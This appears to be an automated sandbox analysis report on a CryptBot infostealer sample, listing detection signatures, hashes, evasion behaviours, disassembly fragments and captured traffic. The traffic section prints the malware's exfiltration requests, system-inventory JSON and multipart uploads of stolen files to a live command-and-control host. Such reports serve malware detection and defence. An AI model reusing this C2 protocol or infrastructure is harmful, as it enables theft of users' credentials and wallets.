Windows Analysis Report
u25XzKsRuY.exe

Overview

General Information

Sample name: u25XzKsRuY.exe
renamed because original name is a hash value
Original sample name: caff2cb5b9711330f2bf627f5b0c7e52.exe
Analysis ID: 1579685
MD5: caff2cb5b9711330f2bf627f5b0c7e52
SHA1: 683c47fcd30dbb4bdd93f137baf9fe75ab393877
SHA256: 1d7fb83b6159044a657af3fd506753e2da90aad3028c86ef8f6225509b791f26
Tags: exeuser-abuse_ch
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

barindex
Source: u25XzKsRuY.exe Avira: detected
Source: u25XzKsRuY.exe Virustotal: Detection: 54% Perma Link
Source: u25XzKsRuY.exe ReversingLabs: Detection: 63%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: u25XzKsRuY.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002015B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 9_2_002015B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C8414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 9_2_6C8414B0
Source: u25XzKsRuY.exe, 00000000.00000003.1303473733.00000000071E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_2e2ef008-0
Source: u25XzKsRuY.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\ Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\.ms-ad\ Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\Local\Google\ Jump to behavior
Source: C:\Users\user\Desktop\u25XzKsRuY.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 9_2_002081E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C8BAEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C8BAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C8BAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C860860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C86A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C86A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C86A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C91F960h 9_2_6C85EB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 9_2_6C8E84A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C864453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C86A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C86A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6C86A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C86C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C86E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C86E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 9_2_6C8E0730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C860740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C8BC040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C8BC1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 9_2_6C89A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6C860260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C91D014h] 9_2_6C914360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C8BBD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6C8B7D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 9_2_6C8B3840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 9_2_6C86D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C87BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C87BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C899B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C8BB4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6C86D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C91DFF4h 9_2_6C8B3690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_6C8B9600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 9_2_6C86D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 9_2_6C86D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C85B1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 9_2_6C8E3140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6C86D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 9_2_6C8D7350
Source: chrome.exe Memory has grown: Private usage: 1MB later: 29MB

Networking

barindex
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.10:49780 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.10:49820 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.10:49791 -> 185.121.15.192:80
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 559367Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 39 33 35 34 37 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=TIjmSmLKkWqFkxPF1734935484 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------HpVklQOadd3PdC8FU0cN1nData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 48 70 56 6b 6c 51 4f 61 64 64 33 50 64 43 38 46 55 30 63 4e 31 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 61 73 65 73 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ec d1 77 58 64 57 8c 8f 35 3c 02 30 47 13 1d 46 4f b8 30 53 7e 44 25 c6 c3 2b 80 2a 7a d2 a2 a8 90 63 f4 65 97 be 14 81 83 b3 a6 c4 dc 95 aa 1c d7 bc 3d be 20 94 72 dd b8 fd 6d 16 e5 20 2a e3 63 fb 03 90 97 dc 69 85 76 d6 ec db a4 cc 9e 39 1e 1c 69 0f 05 52 d5 c0 92 2c a9 5e 86 ed da c0 fe cf bb 28 b4 7e 58 2e 61 14 a7 14 02 24 39 33 95 50 ce f6 46 4f d8 ce 41 d2 55 0e fa e2 a1 56 af bc 80 f6 db 32 82 81 b5 d5 7e 41 6d 49 1f 29 78 c5 66 cf 49 6b e6 cb 03 f2 b9 ab 9f 01 e9 a1 80 6e 84 34 17 45 43 7a c4 a5 a7 5b 77 25 e4 44 1a 62 98 c6 f6 aa 19 5e f0 ef 0c 72 69 d9 d1 cb 08 4f ec 08 fd 2c 4b 57 5e 40 2c b4 89 3b a7 de 06 f0 5e a5 ac 74 63 98 55 cc 06 17 6d e0 c9 97 36 04 1c b9 9c 65 1e 5d c1 96 d0 00 d5 41 78 16 8c c7 ea 7b c0 88 1a 0a 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 48 70 56 6b 6c 51 4f 61 64 64 33 50 64 43 38 46 55 30 63 4e 31 6e 2d 2d 0d 0a Data Ascii: --------------------------HpVklQOadd3PdC8FU0cN1nContent-Disposition: form-data; name="file"; filename="Hiwases.bin"Content-Type: application/octet-streamwXdW5<0GFO0S~D%+*zce= rm *civ9iR,^(~X.a$93PFOAUV2~AmI)xfIkn4ECz[w%Db^riO,KW^@,;^tcUm6e]Ax{--------------------------HpVklQOadd3PdC8FU0cN1n--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 89881Content-Type: multipart/form-data; boundary=------------------------2tuyhT1YLaX5sQeJ812FjGData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 74 75 79 68 54 31 59 4c 61 58 35 73 51 65 4a 38 31 32 46 6a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 69 72 65 66 65 62 69 68 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 9e 83 c4 3d c9 b5 51 ba 7d f5 f5 74 57 91 2d 9f 50 4d 83 8e 9c ad c9 c6 61 e7 ef 80 2c 41 a6 b6 8b a6 bc 1c 7c 34 09 1f e7 fd ea a3 6e ef 62 1e 14 5a d9 ef 95 c6 74 d0 d0 64 83 62 10 77 ac ac 4f 51 e9 77 4e f1 65 52 0a 2a b3 7c 24 e4 54 54 f2 28 6e 91 56 7a 33 18 4f 03 f0 7c 90 fa 7e e2 ce 28 b6 e2 26 45 64 81 20 16 c4 91 d5 f0 68 9c 6d 1f a7 54 4a 12 8f a1 b2 34 fa fb cf 40 5e 3b b1 16 97 0c 27 23 ee 16 fb cf 97 46 36 0e 60 b1 6e eb b1 17 f2 04 4d c4 8a 09 5d d8 86 7b 88 7b 55 39 9f e6 00 72 a2 2d 7f 3c ae 83 e3 24 2d c6 d0 d8 00 b4 4c ec 2d 54 74 cb d4 0f 75 2a 30 94 e8 04 1b f3 59 81 4a 0f 99 a8 3a 65 b8 70 7c c9 f9 3b 56 99 8f d5 40 69 ed 9a 6b da bd 00 9d 3b f4 b3 aa ee 70 89 d2 2c cc 33 5e 22 19 1a 68 2c 03 4d 76 dd b7 cc 61 f8 07 ea a3 fe 8b b0 ac 71 b9 e9 de fb fe ba ad 98 2c 93 d1 2e 26 27 d4 68 48 ae c1 ad cf a4 43 14 d4 fc f6 3d 51 f9 cd 20 8c 52 8c d3 73 2f 27 40 64 e2 86 c4 a1 b6 e5 7f 49 54 b0 d7 28 48 f3 ef 90 78 84 06 f8 29 44 d0 3d 4e 97 fb 8f 7a 2b b5 e6 35 2a 9a 4a ae a9 30 45 7c c8 9a fe 5d ec 88 69 d4 b2 4e c0 3e 6c 36 16 f8 06 d1 e5 f0 d8 0d ee be 03 f5 ad ed ca 86 60 67 cd f9 b1 16 ba c1 7b 6f 8c c7 d4 81 28 56 c9 ac b0 22 89 ab 4e cc 71 4c a7 07 70 7f 65 bc 1e a3 7f 35 7c fc 80 e1 c6 62 65 3c f8 96 8d b9 f8 83 bc 4d f0 0e e3 4c bd 64 58 9e 60 f8 70 e9 2a 4c 43 49 5a e0 b6 5f e7 be 77 2f fc 05 1c 2c 17 bf 74 29 3d fd ba 93 22 5a b8 da 30 a1 2d b8 6d 1c 02 b5 35 1b 49 9f a3 eb 78 12 66 77 99 cb 9f 42 dd 08 16 59 56 60 3b 2e f7 2e 15 19 50 be 4d 49 63 61 e1 68 7d e3 0c 1e e1 a0 bc 29 e1 b3 8a 63 f5 3f ad d2 88 3b 13 26 c6 cf a4 c4 3b b5 1c fd e0 23 49 8a a8 53 7f 5d 73 96 4d a2 7d 9c d9 4a 5a d0 a1 ba 39 7a 84 de 47 26 81 be ed ee bf 08 3a 80 da 76 bc 25 bf 10 09 85 ac 55 ff 16 d5 56 98 b3 63 aa 37 63 85 80 8a 54 02 6e 69 e5 4b 14 17 ad 4f de 8a 11 22 1b b7 ed c4 64 6e a4 bb e1 e4 b0 42 88 82 75 3b 83 b8 60 4b a2 50 77 d7 56 b9 59 58 d7 43 d3 54 fe 0a b5 29 07 7e e0 04 0c 88 60 d6 da 71 3d d7 30 e3 a9 af ad 0d b0 da 21 c3 28 10 c2 ba c7 25 b0 b5 4e 8e 0f ea b9 db 18 70 82 d0 80 c7 1f 36 b4 33 9e 49 7e 21 f0 45 c3 c7 db 26 73 db 24 b5 83 54 09 3e 74 fd a7 0d 80 c5 c1 a0 fb b4 11 c4 93 64 6a 0f a3 0b c4 15 2e 81 74 87 1b 55 15 34 9d b0 8f 65 c6 23 e6 d4 51 ac a8 01 7f ad 21 3f 6b 16 16 30 f9 2c aa ad 11 c0 21 7f a9 2e 11 0b c2 46 8f ba d5 a7 ff a2 67 23 6b 66
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 30348Content-Type: multipart/form-data; boundary=------------------------WebyjpLTr5xEri4kczUbDhData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 65 62 79 6a 70 4c 54 72 35 78 45 72 69 34 6b 63 7a 55 62 44 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 69 78 65 7a 65 7a 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a c9 ce b4 02 5e 81 7a 3a 93 34 9d bf 38 83 c1 11 1f 90 ce b3 b0 c4 52 5b 93 b1 5c d3 a1 5d 24 90 3c 14 1e 51 7e 9f 65 3c c1 73 92 ed b3 db 28 f0 98 6b 89 9f 53 e7 cf 71 63 0a 60 e0 e8 11 14 c1 44 f0 7d f7 86 a0 21 cc ac 34 04 91 cd ec 99 55 89 59 55 0c 26 59 0e 80 6f 38 0a f2 67 7a 5f 93 dd fb f4 c9 ff 62 db b3 6e 73 ab 5d c5 74 0b 5a 7d 0a d8 0c b7 bf 1d 77 ea 64 65 d9 3a ba aa 10 bd 70 8a 34 20 a2 22 2b 39 63 ab fa 97 1f 66 6b fc 94 22 5a a8 43 27 ee 6e 9a 1a f4 44 3f 09 c1 3e b7 6f c4 5b d5 29 34 ef b8 cb 8d a0 54 3a c4 b6 5c f2 19 e2 4f 64 b8 86 05 ac f8 fa e7 0c 23 8b c7 5e 23 30 af e0 5d 7d cf e2 2c 1e ee 5d 8b 85 06 58 20 11 42 41 5f 01 13 7d c2 52 9e 91 58 d2 2b ad 8c 62 b5 5c 0a 0b c5 35 59 48 bc b7 b2 53 0d 84 4e c0 28 d7 16 61 86 4c 8e 0f ef ec 94 7c 54 ee d3 2f 92 0f da b9 47 e1 7f c4 b6 33 7a 39 37 7b 37 69 3e 22 d7 14 24 7d 61 c1 d9 02 b8 7c 7e c0 13 ad e3 24 47 1a d5 96 da 56 72 3d aa bc d0 87 fd 9b 83 79 02 b4 13 76 fa 8c 40 dd 60 6b 2c 3c ab 1d 08 95 b6 ca f4 4a a0 46 28 0c bf ce 98 8c b1 19 e3 94 13 ba 2f 16 1b 39 87 8a 5f c5 17 1f a2 0b 4c f8 c8 ca 3e a1 0a f0 35 0c a6 12 b6 95 28 75 32 de ab a3 87 42 63 76 a6 e0 1c 1b 9f aa e3 d8 96 a2 d4 b4 5a e2 f8 a2 85 c3 0e aa cf 8c bd 10 19 be ee c6 35 a2 f2 4d 7d 66 56 d6 e8 d2 8e f0 96 e3 76 24 10 b8 64 d2 ba 8e cc 57 24 49 90 c7 e5 ec e1 94 00 e9 83 dd f4 84 55 d6 75 83 0f 15 ac fb d4 f1 ed 24 40 75 d5 06 b7 d6 38 57 e9 e8 4f 18 12 f0 63 86 76 02 15 3d 74 ec 2b b6 b6 c9 1b 19 7a 78 74 0d a8 7e 46 e4 06 a6 05 99 fe ad f6 d3 9f d3 21 ac f9 2f 93 69 3e 71 ea 03 95 81 48 41 95 27 82 b6 cd 08 d1 94 e2 29 66 95 8c 6b f3 91 e8 ae 37 97 8c 96 98 00 e3 2d 70 02 ad 52 e7 58 ef 89 90 7e cd be b1 32 b7 0e 5e 09 51 33 fb 8d 9c 7e 46 2b 5d 99 37 f3 89 4c 94 61 dd 47 e1 8c 9e e4 9b 06 c6 a4 45 d5 72 50 7f b9 f0 89 ee 17 60 78 09 2b 43 64 e0 a8 b7 1a de 8d ad 8f 47 d5 eb 65 d7 5f 30 db a1 9d e7 e4 a1 00 43 38 77 59 59 05 e6 2f 77 24 92 f4 28 a2 15 6f 4b ea a6 38 66 aa 98 90 65 c1 ac c1 63 59 1c 78 5b dc f0 c3 7e f5 7d 4d 22 80 98 42 89 21 0d c7 3f 4c c6 72 be 79 f8 ca 25 4d b9 ea 5a c0 54 9f 92 a3 95 31 04 d1 3f 82 8e 9e 4c 93 c8 c3 6c f9 aa be fe 1d 61 ec d4 d7 eb 34 ed 96 6a be 04 12 48 5e bc bc ee d2 57 58 60 60 8a ba f8 e0 84 a1 9b 6f 89 f4 7a 75 70 cb a4 53 a1 82 7e c1 13 33 69 b3 76 c9 a7 2d d7 75 9e 2e f7 95 52 da 45 dc 35 ae 49
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 54 49 6a 6d 53 6d 4c 4b 6b 57 71 46 6b 78 50 46 31 37 33 34 39 33 35 34 38 34 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "TIjmSmLKkWqFkxPF1734935484", "data": "Done2" }
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View IP Address: 98.85.100.80 98.85.100.80
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=TIjmSmLKkWqFkxPF1734935484 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: chrome.exe, 00000003.00000002.1723399284.0000350C00677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.1721527976.0000350C0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.coP equals www.youtube.com (Youtube)
